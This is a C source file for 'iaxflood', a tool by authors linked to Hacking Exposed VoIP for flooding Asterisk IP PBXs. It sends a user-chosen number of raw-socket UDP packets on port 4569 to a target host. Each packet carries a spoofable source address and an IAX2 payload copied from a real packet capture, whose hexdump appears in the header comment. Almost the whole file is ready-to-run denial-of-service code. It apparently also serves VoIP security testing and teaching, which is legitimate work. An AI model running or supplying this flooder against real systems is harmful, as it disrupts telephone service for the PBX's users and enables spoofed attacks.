//-------------------------------------------------------------------------------
//
// iaxflood.c - A UDP Inter-Asterisk_eXchange (i.e. IAX)
// packet was captured from an IAX channel
// between two Asterisk IP PBX's. The content
// of that packet is the source of the payload
// for the attack embodied by this tool. While the
// IAX protocol header might not match the
// Asterisk PBX you'll attack with this tool, it
// may require more processing on the part of
// the PBX than a simple udpflood without any
// payload that even resembles an IAX payload.
//
// The packet content on which the payload for this tool is
// based follows:
//
// This is a print of an IAX channel RTP bearing minipacket from an inter-domain
// call. Offsets into the packet are as follows:
//
// Offset:
//
// 0x1e - Beginning of IP header
//
// 0x10 - IP header's total length field (i.e. 192 = 0x00c0)
//
// 0x22 - Source port (i.e. 4569, the default IAX channel port) - Beginning of UDP header
//
// 0x24 - Dest port (i.e. 4569, the default IAX channel port)
//
// 0x26 - UDP header's Length field (i.e. 172 = 0x00ac)
//
// 0x28 - UDP header's Checksum field - Ethereal claims it is incorrect and should
// be 0x58B5.
//
// 0x2a - This is the beginning of the 4 byte IAX version/call id field.
// The "source call" field is the 16 bits beginning at offset 0x2a (i.e. 4)
// The Timestamp is the 16 bits beginning at offset 0x2c (i.e. 9869)
//
// 0x2e - This is the start of the RTP data (i.e. beginning with value 0xca). The
// RTP payload is 160 bytes in length.
//
// No. Time Source Destination Protocol Info
// 110 12.723515 10.1.101.2 10.1.101.1 IAX2 Mini packet, source call# 4, timestamp 9869ms, Raw mu-law data (G.711)
//
// Frame 110 (206 bytes on wire, 206 bytes captured)
// Ethernet II, Src: DellComp_db:7e:71 (00:08:74:db:7e:71), Dst: 3com_ce:72:c0 (00:10:5a:ce:72:c0)
// Internet Protocol, Src: 10.1.101.2 (10.1.101.2), Dst: 10.1.101.1 (10.1.101.1)
// User Datagram Protocol, Src Port: 4569 (4569), Dst Port: 4569 (4569)
// Source port: 4569 (4569)
// Destination port: 4569 (4569)
// Length: 172
// Checksum: 0xdec2 [incorrect, should be 0x58b5]
// Inter-Asterisk eXchange v2
// Packet type: Mini voice packet (0)
// .000 0000 0000 0100 = Source call: 4
// Call identifier: 1
// Timestamp: 9869
// Absolute Time: Jul 17, 2006 19:45:03.263803000
// Lateness: -0.001746000 seconds
// IAX2 payload (160 bytes)
// Data (160 bytes)
//
// 0000 00 10 5a ce 72 c0 00 08 74 db 7e 71 08 00 45 10 ..Z.r...t.~q..E.
// 0010 00 c0 00 30 40 00 40 11 5b e8 0a 01 65 02 0a 01 ...0@.@.[...e...
// 0020 65 01 11 d9 11 d9 00 ac de c2 00 04 26 8d ca f5 e...........&...
// 0030 52 e8 7c f6 7c 5e f7 e6 62 6c da 78 6e 52 69 d9 R.|.|^..bl.xnRi.
// 0040 6e 76 77 fb d9 6c f1 ee 6e 5d 6d e4 df e3 69 d8 nvw..l..n]m...i.
// 0050 61 62 f7 54 d7 de 55 e1 f1 65 79 79 6c ca f7 4d ab.T..U..eyyl..M
// 0060 6b ef ee 64 7b eb d8 6c 51 dc eb 6a 66 6f e1 ec k..d{..lQ..jfo..
// 0070 6b 64 d5 e6 59 5f f3 e1 f1 67 6f e3 f0 63 75 da kd..Y_...go..cu.
// 0080 f7 6a 68 73 e3 73 6d f0 70 ea 7b fc ef 71 66 74 .jhs.sm.p.{..qft
// 0090 eb 6e ef ef 5a fa ea 66 76 ed e1 6c 6f e9 72 fa .n..Z..fv..lo.r.
// 00a0 65 73 d6 e0 5f 5e dc e3 67 76 5e e2 e5 53 ef e3 es.._^..gv^..S..
// 00b0 5c f5 ec 62 ea 6b 55 df e9 e8 f7 62 f4 f9 f2 ee \..b.kU....b....
// 00c0 7c 6f 5d ee e6 fb f2 ed 5d 7d f2 7d e6 7a |o].....]}.}.z
//
// This tool is derived from code downloaded from
// www.packetstromsecurity.nl. Its origin is
// unknown. There was no copyright or license
// accompanying the code. As such, the following
// copyright/license is applied to this derivation.
//
// Copyright (C) 2006 Mark D. Collier/Mark O'Brien
//
// This program is free software; you can redistribute it and/or modify
// it under the terms of the GNU General Public License as published by
// the Free Software Foundation; either version 2 of the License, or
// (at your option) any later version.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License
// along with this program; if not, write to the Free Software
// Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
//
// Author: Mark D. Collier/Mark O'Brien - 07/19/2006 v1.0
// www.securelogix.com - [email protected]
// www.hackingexposedvoip.com
//
//-------------------------------------------------------------------------------
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in_systm.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/udp.h>
#include <errno.h>
#include <string.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <stdio.h>
#include <stdlib.h>
struct sockaddr sa;
main ( int argc, char **argv ) {
int fd;
int x = 1;
int srcport, destport;
int numpackets;
struct sockaddr_in *p;
struct hostent *he;
// Description of IP header bytes in first 5 lines:
//
// IP version & hdr len 0x45, DSCP 0x10, IP packet len 0x00c0
// IP hdr ID 0x0030, Fragment spec (i.e. don't frag, offset 0) 0x4000
// TTL (0x40), UDP protocol (0x11), hdr checksum 0x0000
// src IP
// dest IP
//
//Description of UDP header in lines 6 and 7:
//
// src port 4569, dest port 4569
// UDP packet len, checksum (flagged as incorrect by Ethereal)
//
// IAX2 header in line 8:
// source call = 4, Timestamp: 9869
//
// RTP payload beginning in line 9
u_char gram[192]=
{
0x45, 0x10, 0x00, 0xC0,
0x00, 0x30, 0x40, 0x00,
0x40, 0x11, 0x00, 0x00,
0, 0, 0, 0,
0, 0, 0, 0,
0x11, 0xD9, 0x11, 0xD9,
0x00, 0xAC, 0xDE, 0xC2,
0x00, 0x04, 0x26, 0x8d,
0xca, 0xf5, 0x52, 0xe8, 0x7c, 0xf6, 0x7c, 0x5e,
0xf7, 0xe6, 0x62, 0x6c, 0xda, 0x78, 0x6e, 0x52,
0x69, 0xd9, 0x6e, 0x76, 0x77, 0xfb, 0xd9, 0x6c,
0xf1, 0xee, 0x6e, 0x5d, 0x6d, 0xe4, 0xdf, 0xe3,
0x69, 0xd8, 0x61, 0x62, 0xf7, 0x54, 0xd7, 0xde,
0x55, 0xe1, 0xf1, 0x65, 0x79, 0x79, 0x6c, 0xca,
0xf7, 0x4d, 0x6b, 0xef, 0xee, 0x64, 0x7b, 0xeb,
0xd8, 0x6c, 0x51, 0xdc, 0xeb, 0x6a, 0x66, 0x6f,
0xe1, 0xec, 0x6b, 0x64, 0xd5, 0xe6, 0x59, 0x5f,
0xf3, 0xe1, 0xf1, 0x67, 0x6f, 0xe3, 0xf0, 0x63,
0x75, 0xda, 0xf7, 0x6a, 0x68, 0x73, 0xe3, 0x73,
0x6d, 0xf0, 0x70, 0xea, 0x7b, 0xfc, 0xef, 0x71,
0x66, 0x74, 0xeb, 0x6e, 0xef, 0xef, 0x5a, 0xfa,
0xea, 0x66, 0x76, 0xed, 0xe1, 0x6c, 0x6f, 0xe9,
0x72, 0xfa, 0x65, 0x73, 0xd6, 0xe0, 0x5f, 0x5e,
0xdc, 0xe3, 0x67, 0x76, 0x5e, 0xe2, 0xe5, 0x53,
0xef, 0xe3, 0x5c, 0xf5, 0xec, 0x62, 0xea, 0x6b,
0x55, 0xdf, 0xe9, 0xe8, 0xf7, 0x62, 0xf4, 0xf9,
0xf2, 0xee, 0x7c, 0x6f, 0x5d, 0xee, 0xe6, 0xfb,
0xf2, 0xed, 0x5d, 0x7d, 0xf2, 0x7d, 0xe6, 0x7a
};
if ( argc != 4 ) {
fprintf ( stderr,
"usage: %s sourcename destinationname numpackets\n",
*argv );
exit ( EXIT_FAILURE );
}
// srcport = atoi ( argv[3] );
// destport = atoi ( argv[4] );
srcport = 4569; // the well-known iax port
destport = 4569; // the well-known iax port
numpackets = atoi ( argv[3] );
fprintf ( stderr,
"Will flood port %d from port %d %d times",
destport, srcport, numpackets );
if ( ( he = gethostbyname ( argv[1] ) ) == NULL ) {
fprintf ( stderr, "can't resolve source hostname\n" );
exit ( EXIT_FAILURE );
}
bcopy ( *(he->h_addr_list), (gram+12), 4 );
if ( ( he = gethostbyname( argv[2] ) ) == NULL ) {
fprintf ( stderr, "can't resolve destination hostname\n" );
exit ( EXIT_FAILURE );
}
bcopy ( *(he->h_addr_list), (gram+16), 4 );
// *(u_short*)(gram+20) = htons( (u_short) srcport );
// *(u_short*)(gram+22) = htons( (u_short) destport );
p = ( struct sockaddr_in* ) &sa;
p->sin_family = AF_INET;
bcopy ( *(he->h_addr_list), &(p->sin_addr), sizeof(struct in_addr) );
if ( ( fd = socket ( AF_INET, SOCK_RAW, IPPROTO_RAW ) ) == -1 ) {
perror("socket");
exit ( EXIT_FAILURE );
}
#ifdef IP_HDRINCL
fprintf ( stderr, "\nWe have IP_HDRINCL \n" );
if ( setsockopt ( fd, IPPROTO_IP, IP_HDRINCL, (char*)&x, sizeof(x) ) < 0 ) {
perror ( "setsockopt IP_HDRINCL" );
exit ( EXIT_FAILURE );
}
#else
fprintf ( stderr, "\nWe don't have IP_HDRINCL \n" );
#endif
printf("\nNumber of Packets sent:\n\n");
//
// Main loop
//
for ( x = 0; x < numpackets; x++ ) {
if ( ( sendto ( fd,
&gram,
sizeof(gram),
0,
( struct sockaddr* ) p,
sizeof(struct sockaddr) ) )
== -1 ) {
perror ( "sendto" );
exit ( EXIT_FAILURE );
}
printf ( "\rSent %d ", x+1 );
}
printf ( "\n" );
exit ( EXIT_SUCCESS );
} // end iaxflood